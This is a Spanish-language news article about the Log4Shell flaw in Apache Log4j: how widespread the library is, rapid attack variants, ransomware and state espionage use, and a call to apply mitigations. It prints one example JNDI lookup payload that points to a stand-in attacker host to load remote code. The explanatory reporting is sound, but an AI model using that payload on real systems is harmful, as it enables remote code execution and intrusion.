Log4Shell, una vulnerabilidadcatalogada como el fallo del siglo

El hallazgo de una vulnerabilidad en la librería Java Apache Log4j ha desatado una cadena de todo tipo de intentos de ciberdelitos. En solo 3 días se registraron más de 60 variantes de ataques.

Log4j es una librería Java ampliamente utilizada por desarrolladores en todo tipo de aplicaciones y servicios. Para que nos hagamos una idea, se utiliza en Twitter, Amazon, Microsoft y Minecraft, entre otras. Log4j tiene el sello de la Apache Software Foundation, lo que significa que está incluido en la mayor parte del software de Apache, como popularmente lo conocemos. Por su gran calidad es una de las favoritas de los desarrolladores en entornos empresariales y prácticamente está en cualquier servicio web.

Una vulnerabilidad en Apache Log4j en las versiones 2.14.1 y por debajo (CVE-2021 a 44228) ha sido encontrada en esa librería, lo que ha motivado que desde su descubrimiento esté siendo utilizada para su explotación en todo tipo de intentos de ataques y ciberdelitos. Debido a la amplitud de su utilización y a las posibilidades de su uso por parte de atacantes en solo 3 días tuvo más de 60 variantes de ataques.

Actualmente ha sido detectada para distribución de malware ransomware (ataques de cifrado y robo de datos con chantajes monetarios, respectivamente) y siendo usada por algunos países para ataques dirigidos al robo de tecnología e información confidencial. No es ninguna broma.

[La guerra contra el ransomware, por Marcelino Madrigal]

Los ataques que se están produciendo se basan en que esta vulnerabilidad permite que los atacantes ejecuten su propio código en las máquinas afectadas. Esto se hace utilizando las funciones de Java Naming and Directory Interface (JNDI), que son parte de la API, el mecanismo que permite la comunicación entre los desarrolladores y esta librería para realizar acciones o procesos.

La explotación de esta vulnerabilidad, es decir, su uso, es lo que hemos bautizado como Log4Shell.

Un ataque en Log4j tendría una forma parecida a esta línea de comando. Tan simple como terrible y efectivo:

${jndi:ldap://atacante.com/script_atacante}

La vulnerabilidad se ha desarrollado tan rápido que proveedores como Checkpoint avisaron de que en pocas horas ya había más de 60 versiones de variantes de estos ataques. Microsoft mantiene una entrada con la detección y mitigaciones de este problema en sus entornos. Lo pueden encontrar aquí.

La situación alrededor de Log4j es tan grave que el mismo Microsoft ha notificado que grupos relacionados con países como Corea del Norte, Turquía, China o Irán están utilizando ya esta vulnerabilidad para ataques dirigidos con el objetivo de acceder a datos o información tecnológica, o de interés para dichos Gobiernos. Sí: traducido, estamos hablando de espionaje.

Y por si fuera poco esto se está utilizando a estas horas para evaluar posibles ataques ransomware, como el del Sevicio Público de Empleo Estatal (SEPE), para que nos entendamos todos, en todo el ecosistema tecnológico.

Se conocen los métodos para mitigar este tsunami. Es hora de ponerse a trabajar para prevenir daños antes de que se produzcan. Hay información disponible sobre cómo acometer el problema de Log4j para los profesionales. Por favor, úsenla.

Malos tiempos que debemos afrontar.

Fuente noticia: https://www.newtral.es/
Fuente foto: freepik.es

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *